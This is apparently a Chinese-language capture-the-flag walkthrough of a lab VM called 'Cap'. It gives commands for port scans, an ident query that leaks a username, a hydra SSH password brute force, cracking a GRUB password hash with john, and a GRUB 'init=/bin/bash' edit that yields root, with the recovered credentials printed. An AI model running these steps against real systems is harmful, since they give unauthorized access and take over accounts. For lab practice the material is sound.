# 靶场搭建
下载:Cap
Nat,IP: 192.168.1.179
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It w |
┌──(root㉿kali)-[~] | |
└─# nmap -6 -p- -A fe80::20c:29ff:fe15:15d2%eth0 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 04:46 EDT | |
Nmap scan report for fe80::20c:29ff:fe15:15d2 | |
Host is up (0.00055s latency). | |
Not shown: 65532 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
113/tcp open ident? |
名称是 Cap,要监听流量,所以打开 wireshark,连接一下 113 端口 ncat -6 fe80::20c:29ff:fe15:15d2%eth0 113
看到本地的端口,发送 113,本地端口
得到用户名 lucas
爆破一下密码: hydra -l lucas -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.179 -I -t 64
拿到了密码: capricorn
信息收集发现 /boot/grub/grub.cfg
文件,里面有哈希,解密
grub.pbkdf2.sha512.10000.E9DF42546DD8E4FA1D59A023BF0E3D9C83FFE8F0C1DE14FB88BCCCBBE5BD8FA7DAF1A9AC25593A43E094F8F00E8D0CDF81F066993234AC53DF5EE59BDD288E82.85C7A1032D4FA7D74E645A13DEBE367CFBF5A3AE7B1378D99BC2D00FF9EF8187F602865B972B538BC1678E17EEFE7A27C80AC1DD96D906FC1FBA5079779F163E |
john 解密结果: starwars
su 不过去,ssh 连不上
看了 WP 之后,发现需要重启,然后进入编辑模式进行,要实体操作
进入编辑模式用这个密码,然后把 ro 改成 rw init=/bin/bash
F10 保存重启,就拿到了 root 权限
可以 passwd 改一下密码,可以 su 过去了